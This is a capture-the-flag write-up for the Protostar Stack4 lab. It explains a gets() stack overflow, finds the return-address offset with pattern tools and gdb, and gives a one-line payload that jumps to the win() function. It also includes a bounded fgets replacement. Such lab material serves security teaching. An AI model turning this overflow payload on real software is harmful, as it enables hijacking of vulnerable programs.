Protostar - Stack4

You can find the Protostar VM here: Protostar

Let’s check the source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

We have a function win, a 64-byte buffer, and the vulnerable function gets.

gets -> does not check the length of its input; it keeps copying bytes into buffer until it sees a newline, no matter how large buffer is.
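As an added example (not part of the challenge binary or this writeup), here is the bounded form of the same read: fgets stores at most sizeof(buffer)-1 bytes and always NUL-terminates, so an over-long line can no longer reach the saved return address. The helper name read_line_bounded and its truncation flag are my own.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen in tests; fgets needs nothing extra */
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads at most cap-1 bytes into buf,
 * always NUL-terminates, and discards the rest of an over-long line so
 * it cannot spill into the next read. Sets *truncated when input was
 * dropped. Returns the stored length, or -1 on EOF with nothing read. */
long read_line_bounded(char *buf, size_t cap, FILE *in, int *truncated)
{
    *truncated = 0;
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';              /* complete line: drop the newline */
        return (long)len;
    }

    /* No newline: either a partial last line at EOF or a line longer than
     * the buffer. Drain up to the newline and flag anything thrown away. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *truncated = 1;
    return (long)len;
}

int main(void)
{
    char buffer[64];                    /* same 64-byte buffer as stack4 */
    int truncated;
    long n = read_line_bounded(buffer, sizeof buffer, stdin, &truncated);
    if (n < 0)
        return 1;
    if (truncated)
        fprintf(stderr, "input truncated to %ld bytes\n", n);
    return 0;
}
```

Fed the same 100 "A"s the writeup uses, the buffer ends up holding 63 bytes plus the terminator and the process exits cleanly instead of crashing.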

Let’s run the binary.

user@protostar:/opt/protostar/bin$ ./stack4
pwn 

It takes input; let’s check whether it is vulnerable.

user@protostar:/opt/protostar/bin$ python -c 'print "A" * 100' | ./stack4
Segmentation fault

Now let’s find the offset.

$ ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

user@protostar:/opt/protostar/bin$ gdb -q ./stack4
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r
Starting program: /opt/protostar/bin/stack4 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()
(gdb) 

$ ./pattern_offset.rb -q 0x63413563
[*] Exact match at offset 76

Perfect, now let’s find the address of the win function.

user@protostar:/opt/protostar/bin$ objdump -d ./stack4 | grep win
080483f4 <win>:

Let’s make the exploit now.

>>> from pwn import *
>>> p32(0x080483f4)
b'\xf4\x83\x04\x08'

user@protostar:/opt/protostar/bin$ python -c 'print "A" * 76 + "\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault